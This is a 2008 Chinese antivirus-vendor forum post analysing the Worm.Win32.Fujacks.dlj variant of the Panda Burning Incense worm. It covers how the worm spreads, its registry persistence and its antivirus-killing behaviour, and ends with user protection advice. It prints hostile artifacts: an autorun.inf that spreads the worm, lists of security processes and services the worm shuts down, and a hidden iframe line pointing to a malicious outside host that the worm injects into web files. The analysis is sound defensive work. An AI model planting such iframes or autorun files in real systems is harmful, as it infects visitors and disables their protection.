微点交流论坛 - 病毒快报 - 熊猫烧香变种Worm.Win32.Fujacks.dlj

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 病毒快报 » 熊猫烧香变种Worm.Win32.Fujacks.dlj

pioneer
超级版主

积分 4563
发帖 4545
注册 2007-7-16
来自 BJ

#1 熊猫烧香变种Worm.Win32.Fujacks.dlj

Worm.Win32.Fujacks.dlj

捕获时间

2008-07-05

病毒摘要

该程序是使用Delphi编写的蠕虫程序，由微点主动防御软件自动捕获，采用UPX加壳方式试图躲避特征码扫描,加壳后长度为75,783字节，无图标，病毒扩展名为exe，主要通过网页木马、文件捆绑、移动存储介质、局域网的方式传播。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、移动存储介质、局域网传播

安全提示

　　已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”，请直接选择删除处理（如图1）；

　如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现"Worm.Win32.Fujacks.dlj”，请直接选择删除（如图2）。

对于未使用微点主动防御软件的用户，微点反病毒专家建议：
1、不要在不明站点下载非官方版本的软件进行安装，避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放，具体操作步骤：开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新，及时打好漏洞补丁。

[ Last edited by pioneer on 2008-7-14 at 09:29 ]

※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※

2008-7-5 16:28

pioneer
超级版主

积分 4563
发帖 4545
注册 2007-7-16
来自 BJ

#2

病毒分析

该样本程序被执行后，在C:\目录下释放驱动文件ssdt.sys；调用SCM写注册表，将驱动程序ssdt.sys注册成名为RESSDT的服务，使用相关API函数启动被注册的服务加载驱动程序，驱动加载成功后使用相关API函数将驱动文件和被注册的服务项删除，驱动作用是：恢复SSDT，使部分杀毒软件监控失效；

Quote:

项：HKLM\SYSTEM\CurrentControlSet\Services\ RESSDT\
键值：DisplayName
指向数据：RESSDT
项：HKLM\SYSTEM\CurrentControlSet\Services\ RESSDT\
键值：ImagePath
指向文件：\??\c:\ssdt.sys
项：HKLM\SYSTEM\CurrentControlSet\Services\ RESSDT\
键值：Start
指向数据：03

遍历进程查找如下进程将其关闭；
AVP.exe、Rav.exe、RsAgent.exe、RavMon.exe、RavMonD.exe、RavStub.exe、RavTask.exe、CCenter.exe、360tray.exe、360Safe.exe

通过映像劫持重定向部分杀毒软件，当用户运行这些杀毒软件时，就会触发ntsd -d；

拷贝自身到%SystemRoot%\system32\drivers目录下，重命名为suchost.exe；使用API函数WinExec运行suchost.exe；以批处理的形式将病毒原文件删除；

suchost.exe运行后，开启如下线程：

一线程修改如下注册表健值实现开机自启动、隐藏病毒文件的目的；

Quote:

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
健值：Explorer
指向数据：%SystemRoot%\system32\drivers\suchost.exe

项：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
健值：CheckedValue
指向数据：00

一线程使用相关API函数关闭如下服务：Schedule、sharedaccess、kavsvc、AVP、McAfeeFramework、McShield、McTaskManager、RsCCenter、RsRavMon；使用相关API函数删除如下服务：kavsvc、AVP、McAfeeFramework、McShield、McTaskManager、navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor、MskService、FireSvc、RsCCenter、RsRavMon；删除部分安全软件的自启动项使其不能开机自启动；
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE

一线程使用API函数InternetGetConnectedState判断网络是否连通，如果连通则下载其他病毒程序并运行；

一线程枚举盘符在移动存储介质中释放隐藏病毒文件　　　.exe和autorun.inf，使用Windows自动播放功能来传播病毒；并枚举局域网可用连接，通过局域网传播病毒；
autorun.inf文件内容如下：

Quote:

[AutoRun]
OPEN=　　　.exe
shell\open=打开(&O)
shell\open\Command=　　　.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=　　　.exe

一线程枚举窗口查找窗口名或类名为如下字符串的窗口，通过发送消息将其关闭；
VirusScan、NOD32、Symantec AntiVirus、System Safety Monitor、System Repair Engineer、msctls_statusbar32
遍历进程查找如下进程将其关闭；
Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe

一线程枚举磁盘查找所有文件类型判断扩展名为htm、html、asp、aspx、php、jsp的文件时，在文件内插入<iframe src="http://www.daohang08.com/down/htmmm/mm.Htm" width=0 height=0></iframe>；感染除如下目录以外的RAR、EXE、SCR、PIF、COM文件；感染完毕后，在被感染文件夹下释放一内容为感染时间的文件，名为Desktop_.ini，作为感染标记；
WINDOWS、WinRAR、WINNT、system32、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Common Files、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone

[ Last edited by pioneer on 2008-7-7 at 10:47 ]

※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※

2008-7-5 16:32

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号